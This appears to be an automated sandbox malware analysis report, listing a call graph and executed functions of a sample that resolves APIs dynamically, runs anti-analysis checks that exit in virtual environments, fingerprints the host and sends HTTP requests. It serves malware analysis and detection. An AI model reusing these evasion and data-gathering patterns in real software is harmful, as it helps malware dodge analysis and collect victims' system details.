726cd2 27075->27076 27077 726c15 8 API calls 27075->27077 27078 726cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27076->27078 27079 726d4f 27076->27079 27077->27076 27078->27079 27080 726de9 27079->27080 27081 726d5c 6 API calls 27079->27081 27082 726f10 27080->27082 27083 726df6 12 API calls 27080->27083 27081->27080 27084 726f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27082->27084 27085 726f8d 27082->27085 27083->27082 27084->27085 27086 726fc1 27085->27086 27087 726f96 GetProcAddress GetProcAddress 27085->27087 27088 726ff5 27086->27088 27089 726fca GetProcAddress GetProcAddress 27086->27089 27087->27086 27090 727002 10 API calls 27088->27090 27091 7270ed 27088->27091 27089->27088 27090->27091 27092 727152 27091->27092 27093 7270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27091->27093 27094 72715b GetProcAddress 27092->27094 27095 72716e 27092->27095 27093->27092 27094->27095 27096 72051f 27095->27096 27097 727177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27095->27097 27098 701530 27096->27098 27097->27096 27407 701610 27098->27407 27100 70153b 27101 701555 lstrcpy 27100->27101 27102 70155d 27100->27102 27101->27102 27103 701577 lstrcpy 27102->27103 27104 70157f 27102->27104 27103->27104 27105 701599 lstrcpy 27104->27105 27107 7015a1 27104->27107 27105->27107 27106 701605 27109 71f1b0 lstrlen 27106->27109 27107->27106 27108 7015fd lstrcpy 27107->27108 27108->27106 27110 71f1e4 27109->27110 27111 71f1f7 lstrlen 27110->27111 27112 71f1eb lstrcpy 27110->27112 27113 71f208 27111->27113 27112->27111 27114 71f21b lstrlen 27113->27114 27115 71f20f lstrcpy 27113->27115 27116 71f22c 27114->27116 27115->27114 27117 71f233 lstrcpy 27116->27117 27118 71f23f 27116->27118 27117->27118 27119 71f258 lstrcpy 27118->27119 27120 71f264 27118->27120 27119->27120 27121 71f286 lstrcpy 27120->27121 27122 71f292 27120->27122 27121->27122 27123 71f2ba lstrcpy 27122->27123 27124 71f2c6 27122->27124 27123->27124 27125 71f2ea lstrcpy 27124->27125 27175 71f300 27124->27175 27125->27175 27126 71f30c lstrlen 27126->27175 27127 71f4b9 lstrcpy 27127->27175 27128 71f3a1 lstrcpy 27128->27175 27129 71f3c5 lstrcpy 27129->27175 27130 71f4e8 lstrcpy 27191 71f4f0 27130->27191 27131 71f479 lstrcpy 27131->27175 27132 71f70f StrCmpCA 27138 71fe8e 27132->27138 27132->27175 27133 71f616 StrCmpCA 27133->27132 27133->27191 27134 71f59c lstrcpy 27134->27191 27135 71fa29 StrCmpCA 27147 71fe2b 27135->27147 27135->27175 27136 71f73e lstrlen 27136->27175 27137 71fd4d StrCmpCA 27141 71fd60 Sleep 27137->27141 27152 71fd75 27137->27152 27139 71fead lstrlen 27138->27139 27140 71fea5 lstrcpy 27138->27140 27145 71fec7 27139->27145 27140->27139 27141->27175 27142 71fa58 lstrlen 27142->27175 27143 71f64a lstrcpy 27143->27191 27144 701530 8 API calls 27144->27191 27150 71fee7 lstrlen 27145->27150 27155 71fedf lstrcpy 27145->27155 27146 71fe4a lstrlen 27154 71fe64 27146->27154 27147->27146 27148 71fe42 lstrcpy 27147->27148 27148->27146 27149 71f89e lstrcpy 27149->27175 27158 71ff01 27150->27158 27151 71fd94 lstrlen 27167 71fdae 27151->27167 27152->27151 27156 71fd8c lstrcpy 27152->27156 27153 71f76f lstrcpy 27153->27175 27160 71fdce lstrlen 27154->27160 27162 71fe7c lstrcpy 27154->27162 27155->27150 27156->27151 27157 71fbb8 lstrcpy 27157->27175 27166 71ff21 27158->27166 27170 71ff19 lstrcpy 27158->27170 27159 71fa89 lstrcpy 27159->27175 27169 71fde8 27160->27169 27161 71f8cd lstrcpy 27161->27191 27162->27160 27163 71f791 lstrcpy 27163->27175 27165 701530 8 API calls 27165->27175 27171 701610 4 API calls 27166->27171 27167->27160 27174 71fdc6 lstrcpy 27167->27174 27168 71fbe7 lstrcpy 27168->27191 27177 71fe08 27169->27177 27179 71fe00 lstrcpy 27169->27179 27170->27166 27193 71fe13 27171->27193 27172 71faab lstrcpy 27172->27175 27173 71f698 lstrcpy 27173->27191 27174->27160 27175->27126 27175->27127 27175->27128 27175->27129 27175->27130 27175->27131 27175->27132 27175->27135 27175->27136 27175->27137 27175->27142 27175->27149 27175->27153 27175->27157 27175->27159 27175->27161 27175->27163 27175->27165 27175->27168 27175->27172 27176 71ee90 28 API calls 27175->27176 27181 71f7e2 lstrcpy 27175->27181 27184 71fafc lstrcpy 27175->27184 27175->27191 27176->27175 27180 701610 4 API calls 27177->27180 27178 71efb0 35 API calls 27178->27191 27179->27177 27180->27193 27181->27175 27182 71f924 lstrcpy 27182->27191 27183 71f99e StrCmpCA 27183->27135 27183->27191 27184->27175 27185 71fc3e lstrcpy 27185->27191 27186 71fcb8 StrCmpCA 27186->27137 27186->27191 27187 71f9cb lstrcpy 27187->27191 27188 71fce9 lstrcpy 27188->27191 27189 71ee90 28 API calls 27189->27191 27190 71fa19 lstrcpy 27190->27191 27191->27133 27191->27134 27191->27135 27191->27137 27191->27143 27191->27144 27191->27173 27191->27175 27191->27178 27191->27182 27191->27183 27191->27185 27191->27186 27191->27187 27191->27188 27191->27189 27191->27190 27192 71fd3a lstrcpy 27191->27192 27192->27191 27193->26217 27195 722785 27194->27195 27196 72278c GetVolumeInformationA 27194->27196 27195->27196 27197 7227ec GetProcessHeap RtlAllocateHeap 27196->27197 27199 722822 27197->27199 27200 722826 wsprintfA 27197->27200 27417 7271e0 27199->27417 27200->27199 27204 704c70 27203->27204 27205 704c85 27204->27205 27206 704c7d lstrcpy 27204->27206 27421 704bc0 27205->27421 27206->27205 27208 704c90 27209 704ccc lstrcpy 27208->27209 27210 704cd8 27208->27210 27209->27210 27211 704cff lstrcpy 27210->27211 27212 704d0b 27210->27212 27211->27212 27213 704d2f lstrcpy 27212->27213 27214 704d3b 27212->27214 27213->27214 27215 704d6d lstrcpy 27214->27215 27216 704d79 27214->27216 27215->27216 27217 704da0 lstrcpy 27216->27217 27218 704dac InternetOpenA StrCmpCA 27216->27218 27217->27218 27219 704de0 27218->27219 27220 7054b8 InternetCloseHandle CryptStringToBinaryA 27219->27220 27425 723e70 27219->27425 27221 7054e8 LocalAlloc 27220->27221 27238 7055d8 27220->27238 27223 7054ff CryptStringToBinaryA 27221->27223 27221->27238 27224 705517 LocalFree 27223->27224 27225 705529 lstrlen 27223->27225 27224->27238 27226 70553d 27225->27226 27228 705563 lstrlen 27226->27228 27229 705557 lstrcpy 27226->27229 27227 704dfa 27230 704e23 lstrcpy lstrcat 27227->27230 27231 704e38 27227->27231 27233 70557d 27228->27233 27229->27228 27230->27231 27232 704e5a lstrcpy 27231->27232 27235 704e62 27231->27235 27232->27235 27234 70558f lstrcpy lstrcat 27233->27234 27236 7055a2 27233->27236 27234->27236 27237 704e71 lstrlen 27235->27237 27240 7055d1 27236->27240 27241 7055c9 lstrcpy 27236->27241 27239 704e89 27237->27239 27238->26246 27242 704e95 lstrcpy lstrcat 27239->27242 27243 704eac 27239->27243 27240->27238 27241->27240 27242->27243 27244 704ed5 27243->27244 27245 704ecd lstrcpy 27243->27245 27246 704edc lstrlen 27244->27246 27245->27244 27247 704ef2 27246->27247 27248 704efe lstrcpy lstrcat 27247->27248 27249 704f15 27247->27249 27248->27249 27250 704f36 lstrcpy 27249->27250 27251 704f3e 27249->27251 27250->27251 27252 704f65 lstrcpy lstrcat 27251->27252 27253 704f7b 27251->27253 27252->27253 27254 704fa4 27253->27254 27255 704f9c lstrcpy 27253->27255 27256 704fab lstrlen 27254->27256 27255->27254 27257 704fc1 27256->27257 27258 704fcd lstrcpy lstrcat 27257->27258 27259 704fe4 27257->27259 27258->27259 27260 70500d 27259->27260 27261 705005 lstrcpy 27259->27261 27262 705014 lstrlen 27260->27262 27261->27260 27263 70502a 27262->27263 27264 70504d 27263->27264 27265 705036 lstrcpy lstrcat 27263->27265 27266 705071 lstrcpy 27264->27266 27267 705079 27264->27267 27265->27264 27266->27267 27268 705080 lstrlen 27267->27268 27269 70509b 27268->27269 27270 7050ac lstrcpy lstrcat 27269->27270 27271 7050bc 27269->27271 27270->27271 27272 7050da lstrcpy lstrcat 27271->27272 27273 7050ed 27271->27273 27272->27273 27274 70510b lstrcpy 27273->27274 27275 705113 27273->27275 27274->27275 27276 705121 InternetConnectA 27275->27276 27276->27220 27277 705150 HttpOpenRequestA 27276->27277 27278 7054b1 InternetCloseHandle 27277->27278 27279 70518b 27277->27279 27278->27220 27432 727310 lstrlen 27279->27432 27283 7051a4 27440 7272c0 27283->27440 27286 727280 lstrcpy 27287 7051c0 27286->27287 27288 727310 3 API calls 27287->27288 27289 7051d5 27288->27289 27290 727280 lstrcpy 27289->27290 27291 7051de 27290->27291 27292 727310 3 API calls 27291->27292 27293 7051f4 27292->27293 27294 727280 lstrcpy 27293->27294 27295 7051fd 27294->27295 27296 727310 3 API calls 27295->27296 27297 705213 27296->27297 27298 727280 lstrcpy 27297->27298 27299 70521c 27298->27299 27300 727310 3 API calls 27299->27300 27301 705231 27300->27301 27302 727280 lstrcpy 27301->27302 27303 70523a 27302->27303 27304 7272c0 2 API calls 27303->27304 27305 70524d 27304->27305 27306 727280 lstrcpy 27305->27306 27307 705256 27306->27307 27308 727310 3 API calls 27307->27308 27309 70526b 27308->27309 27310 727280 lstrcpy 27309->27310 27311 705274 27310->27311 27312 727310 3 API calls 27311->27312 27313 705289 27312->27313 27314 727280 lstrcpy 27313->27314 27315 705292 27314->27315 27316 7272c0 2 API calls 27315->27316 27317 7052a5 27316->27317 27318 727280 lstrcpy 27317->27318 27319 7052ae 27318->27319 27320 727310 3 API calls 27319->27320 27321 7052c3 27320->27321 27322 727280 lstrcpy 27321->27322 27323 7052cc 27322->27323 27324 727310 3 API calls 27323->27324 27325 7052e2 27324->27325 27326 727280 lstrcpy 27325->27326 27327 7052eb 27326->27327 27328 727310 3 API calls 27327->27328 27329 705301 27328->27329 27330 727280 lstrcpy 27329->27330 27331 70530a 27330->27331 27332 727310 3 API calls 27331->27332 27333 70531f 27332->27333 27334 727280 lstrcpy 27333->27334 27335 705328 27334->27335 27336 7272c0 2 API calls 27335->27336 27337 70533b 27336->27337 27338 727280 lstrcpy 27337->27338 27339 705344 27338->27339 27340 705370 lstrcpy 27339->27340 27341 70537c 27339->27341 27340->27341 27342 7272c0 2 API calls 27341->27342 27343 70538a 27342->27343 27344 7272c0 2 API calls 27343->27344 27345 705397 27344->27345 27346 727280 lstrcpy 27345->27346 27347 7053a1 27346->27347 27348 7053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27347->27348 27349 70549c InternetCloseHandle 27348->27349 27353 7053f2 27348->27353 27351 7054ae 27349->27351 27350 7053fd lstrlen 27350->27353 27351->27278 27352 70542e lstrcpy lstrcat 27352->27353 27353->27349 27353->27350 27353->27352 27354 705473 27353->27354 27355 70546b lstrcpy 27353->27355 27356 70547a InternetReadFile 27354->27356 27355->27354 27356->27349 27356->27353 27358 718cc6 ExitProcess 27357->27358 27359 718ccd 27357->27359 27360 718ee2 27359->27360 27361 718d30 lstrlen 27359->27361 27362 718e56 StrCmpCA 27359->27362 27363 718d5a lstrlen 27359->27363 27364 718dbd StrCmpCA 27359->27364 27365 718ddd StrCmpCA 27359->27365 27366 718dfd StrCmpCA 27359->27366 27367 718e1d StrCmpCA 27359->27367 27368 718e3d StrCmpCA 27359->27368 27369 718d84 StrCmpCA 27359->27369 27370 718da4 StrCmpCA 27359->27370 27371 718d06 lstrlen 27359->27371 27372 718e88 lstrlen 27359->27372 27373 718e6f StrCmpCA 27359->27373 27374 718ebb lstrcpy 27359->27374 27360->26248 27361->27359 27362->27359 27363->27359 27364->27359 27365->27359 27366->27359 27367->27359 27368->27359 27369->27359 27370->27359 27371->27359 27372->27359 27373->27359 27374->27359 27375->26254 27376->26256 27377->26262 27378->26264 27379->26270 27380->26272 27381->26278 27382->26282 27383->26288 27384->26290 27385->26294 27386->26308 27387->26312 27388->26311 27389->26307 27390->26311 27391->26327 27392->26314 27393->26315 27394->26320 27395->26323 27396->26329 27397->26331 27398->26338 27399->26344 27400->26365 27401->26369 27402->26368 27403->26364 27404->26368 27405->26378 27408 70161f 27407->27408 27409 70162b lstrcpy 27408->27409 27410 701633 27408->27410 27409->27410 27411 70164d lstrcpy 27410->27411 27412 701655 27410->27412 27411->27412 27413 70166f lstrcpy 27412->27413 27414 701677 27412->27414 27413->27414 27415 701699 27414->27415 27416 701691 lstrcpy 27414->27416 27415->27100 27416->27415 27418 7271e6 27417->27418 27419 722860 27418->27419 27420 7271fc lstrcpy 27418->27420 27419->26243 27420->27419 27422 704bd0 27421->27422 27422->27422 27423 704bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27422->27423 27424 704c41 27423->27424 27424->27208 27426 723e83 27425->27426 27427 723e9f lstrcpy 27426->27427 27428 723eab 27426->27428 27427->27428 27429 723ed5 GetSystemTime 27428->27429 27430 723ecd lstrcpy 27428->27430 27431 723ef3 27429->27431 27430->27429 27431->27227 27434 72732d 27432->27434 27433 70519b 27436 727280 27433->27436 27434->27433 27435 72733d lstrcpy lstrcat 27434->27435 27435->27433 27437 72728c 27436->27437 27438 7272b4 27437->27438 27439 7272ac lstrcpy 27437->27439 27438->27283 27439->27438 27442 7272dc 27440->27442 27441 7051b7 27441->27286 27442->27441 27443 7272ed lstrcpy lstrcat 27442->27443 27443->27441 27474 7231f0 GetSystemInfo wsprintfA 27445 728471 122 API calls 2 library calls 27446 714c77 296 API calls 27457 71e0f9 140 API calls 27486 716b79 138 API calls 27448 708c79 malloc 27482 71f2f8 93 API calls 27487 701b64 162 API calls 27501 70bbf9 90 API calls 27468 722d60 11 API calls 27488 722b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27489 72a280 __CxxFrameHandler 27477 711269 408 API calls 27449 705869 57 API calls 27450 722853 lstrcpy 27458 722cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27470 713959 244 API calls 27475 7101d9 126 API calls 27459 723cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27502 7233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27491 718615 49 API calls 27452 71e049 147 API calls 27503 718615 48 API calls 27472 723130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27504 71abb2 120 API calls 27478 70f639 144 API calls 27483 7016b9 200 API calls 27494 70bf39 177 API calls 27479 708e20 malloc free std::exception::exception 27460 7230a0 GetSystemPowerStatus 27476 7229a0 GetCurrentProcess IsWow64Process 27495 714b29 304 API calls 27505 7123a9 298 API calls 27497 707710 free ctype 27453 701011 GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27454 722c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27498 729711 138 API calls __setmbcp 27473 724e35 8 API calls 27461 712499 290 API calls 27506 70db99 674 API calls 27456 728819 5 API calls _raise 27507 718615 47 API calls 27462 72749e 7 API calls ctype 27464 722880 10 API calls 27465 724480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27466 723480 6 API calls 27484 723280 7 API calls 27467 718c88 16 API calls 27499 70b309 98 API calls

                          Executed Functions

                          Function 00704C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00704C7F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704CD2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D05
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D35
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D73
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00704DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: f28872c986941d927bd2efb12bede7f2206ed31e453d6dfdb9cfa83c64a15fc4
                          • Instruction ID: c3f10889a89dc86d3d289503fc0c9d1cd362fe82a574f6c698f90ddeebc9c640
                          • Opcode Fuzzy Hash: f28872c986941d927bd2efb12bede7f2206ed31e453d6dfdb9cfa83c64a15fc4
                          • Instruction Fuzzy Hash: D9525C72A15616DBDB21EBA4DC49B9E77F9AF04300F044224F905B7292DB78ED46CFA0
                          Function 00726390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 726390-7263bd GetPEB 2126 7265c3-726623 LoadLibraryA * 5 2125->2126 2127 7263c3-7265be call 7262f0 GetProcAddress * 20 2125->2127 2129 726625-726633 GetProcAddress 2126->2129 2130 726638-72663f 2126->2130 2127->2126 2129->2130 2132 726641-726667 GetProcAddress * 2 2130->2132 2133 72666c-726673 2130->2133 2132->2133 2134 726675-726683 GetProcAddress 2133->2134 2135 726688-72668f 2133->2135 2134->2135 2137 726691-72669f GetProcAddress 2135->2137 2138 7266a4-7266ab 2135->2138 2137->2138 2139 7266d7-7266da 2138->2139 2140 7266ad-7266d2 GetProcAddress * 2 2138->2140 2140->2139
                          APIs
                          • GetProcAddress.KERNEL32(75900000,010D0798), ref: 007263E9
                          • GetProcAddress.KERNEL32(75900000,010D0690), ref: 00726402
                          • GetProcAddress.KERNEL32(75900000,010D07E0), ref: 0072641A
                          • GetProcAddress.KERNEL32(75900000,010D0738), ref: 00726432
                          • GetProcAddress.KERNEL32(75900000,010D8A90), ref: 0072644B
                          • GetProcAddress.KERNEL32(75900000,010C62C0), ref: 00726463
                          • GetProcAddress.KERNEL32(75900000,010C65C0), ref: 0072647B
                          • GetProcAddress.KERNEL32(75900000,010D0570), ref: 00726494
                          • GetProcAddress.KERNEL32(75900000,010D0588), ref: 007264AC
                          • GetProcAddress.KERNEL32(75900000,010D05A0), ref: 007264C4
                          • GetProcAddress.KERNEL32(75900000,010D05B8), ref: 007264DD
                          • GetProcAddress.KERNEL32(75900000,010C62A0), ref: 007264F5
                          • GetProcAddress.KERNEL32(75900000,010D05E8), ref: 0072650D
                          • GetProcAddress.KERNEL32(75900000,010D0600), ref: 00726526
                          • GetProcAddress.KERNEL32(75900000,010C6380), ref: 0072653E
                          • GetProcAddress.KERNEL32(75900000,010D0630), ref: 00726556
                          • GetProcAddress.KERNEL32(75900000,010D0870), ref: 0072656F
                          • GetProcAddress.KERNEL32(75900000,010C64A0), ref: 00726587
                          • GetProcAddress.KERNEL32(75900000,010D08B8), ref: 0072659F
                          • GetProcAddress.KERNEL32(75900000,010C6320), ref: 007265B8
                          • LoadLibraryA.KERNEL32(010D0888,?,?,?,00721C03), ref: 007265C9
                          • LoadLibraryA.KERNEL32(010D0858,?,?,?,00721C03), ref: 007265DB
                          • LoadLibraryA.KERNEL32(010D08A0,?,?,?,00721C03), ref: 007265ED
                          • LoadLibraryA.KERNEL32(010D08E8,?,?,?,00721C03), ref: 007265FE
                          • LoadLibraryA.KERNEL32(010D0900,?,?,?,00721C03), ref: 00726610
                          • GetProcAddress.KERNEL32(75070000,010D08D0), ref: 0072662D
                          • GetProcAddress.KERNEL32(75FD0000,010D0918), ref: 00726649
                          • GetProcAddress.KERNEL32(75FD0000,010D8D78), ref: 00726661
                          • GetProcAddress.KERNEL32(75A50000,010D8DF0), ref: 0072667D
                          • GetProcAddress.KERNEL32(74E50000,010C6600), ref: 00726699
                          • GetProcAddress.KERNEL32(76E80000,010D8B50), ref: 007266B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007266CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 007266C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 61529ce81efc82192ce4329e7c6f1c5384a18f43a9a20f4b31409011d29d7d94
                          • Instruction ID: 9f70c626fa680c86c7adc60edd8c91f8e86b25645f4269a8dc46749ad93ca8ee
                          • Opcode Fuzzy Hash: 61529ce81efc82192ce4329e7c6f1c5384a18f43a9a20f4b31409011d29d7d94
                          • Instruction Fuzzy Hash: ECA15EB9A397009FD758DF65EE88B2637B9F789644300851AF956C3360DBB4A900FF60
                          Function 00721BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 721bf0-721c0b call 702a90 call 726390 2146 721c1a-721c27 call 702930 2141->2146 2147 721c0d 2141->2147 2151 721c35-721c63 2146->2151 2152 721c29-721c2f lstrcpy 2146->2152 2148 721c10-721c18 2147->2148 2148->2146 2148->2148 2156 721c65-721c67 ExitProcess 2151->2156 2157 721c6d-721c7b GetSystemInfo 2151->2157 2152->2151 2158 721c85-721ca0 call 701030 call 7010c0 GetUserDefaultLangID 2157->2158 2159 721c7d-721c7f ExitProcess 2157->2159 2164 721ca2-721ca9 2158->2164 2165 721cb8-721cca call 722ad0 call 723e10 2158->2165 2164->2165 2166 721cb0-721cb2 ExitProcess 2164->2166 2171 721ce7-721d06 lstrlen call 702930 2165->2171 2172 721ccc-721cde call 722a40 call 723e10 2165->2172 2178 721d23-721d40 lstrlen call 702930 2171->2178 2179 721d08-721d0d 2171->2179 2172->2171 2184 721ce0-721ce1 ExitProcess 2172->2184 2186 721d42-721d44 2178->2186 2187 721d5a-721d7b call 722ad0 lstrlen call 702930 2178->2187 2179->2178 2181 721d0f-721d11 2179->2181 2181->2178 2185 721d13-721d1d lstrcpy lstrcat 2181->2185 2185->2178 2186->2187 2188 721d46-721d54 lstrcpy lstrcat 2186->2188 2193 721d9a-721db4 lstrlen call 702930 2187->2193 2194 721d7d-721d7f 2187->2194 2188->2187 2199 721db6-721db8 2193->2199 2200 721dce-721deb call 722a40 lstrlen call 702930 2193->2200 2194->2193 2195 721d81-721d85 2194->2195 2195->2193 2197 721d87-721d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2202 721dba-721dc8 lstrcpy lstrcat 2199->2202 2206 721e0a-721e0f 2200->2206 2207 721ded-721def 2200->2207 2202->2200 2209 721e11 call 702a20 2206->2209 2210 721e16-721e22 call 702930 2206->2210 2207->2206 2208 721df1-721df5 2207->2208 2208->2206 2211 721df7-721e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 721e30-721e66 call 702a20 * 5 OpenEventA 2210->2215 2216 721e24-721e26 2210->2216 2211->2206 2228 721e68-721e8a CloseHandle Sleep OpenEventA 2215->2228 2229 721e8c-721ea0 CreateEventA call 721b20 call 71ffd0 2215->2229 2216->2215 2218 721e28-721e2a lstrcpy 2216->2218 2218->2215 2228->2228 2228->2229 2233 721ea5-721eae CloseHandle ExitProcess 2229->2233
                          APIs
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0798), ref: 007263E9
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0690), ref: 00726402
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D07E0), ref: 0072641A
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0738), ref: 00726432
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D8A90), ref: 0072644B
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C62C0), ref: 00726463
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C65C0), ref: 0072647B
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0570), ref: 00726494
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0588), ref: 007264AC
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05A0), ref: 007264C4
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05B8), ref: 007264DD
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C62A0), ref: 007264F5
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05E8), ref: 0072650D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00721C2F
                          • ExitProcess.KERNEL32 ref: 00721C67
                          • GetSystemInfo.KERNEL32(?), ref: 00721C71
                          • ExitProcess.KERNEL32 ref: 00721C7F
                            • Part of subcall function 00701030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                            • Part of subcall function 00701030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                            • Part of subcall function 00701030: ExitProcess.KERNEL32 ref: 00701058
                            • Part of subcall function 007010C0: GlobalMemoryStatusEx.KERNEL32 ref: 007010EA
                            • Part of subcall function 007010C0: ExitProcess.KERNEL32 ref: 00701114
                          • GetUserDefaultLangID.KERNEL32 ref: 00721C8F
                          • ExitProcess.KERNEL32 ref: 00721CB2
                          • ExitProcess.KERNEL32 ref: 00721CE1
                          • lstrlen.KERNEL32(010D8A50), ref: 00721CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721D15
                          • lstrcat.KERNEL32(00000000,010D8A50), ref: 00721D1D
                          • lstrlen.KERNEL32(00734B98), ref: 00721D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721D48
                          • lstrcat.KERNEL32(00000000,00734B98), ref: 00721D54
                          • lstrlen.KERNEL32(00000000), ref: 00721D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721D94
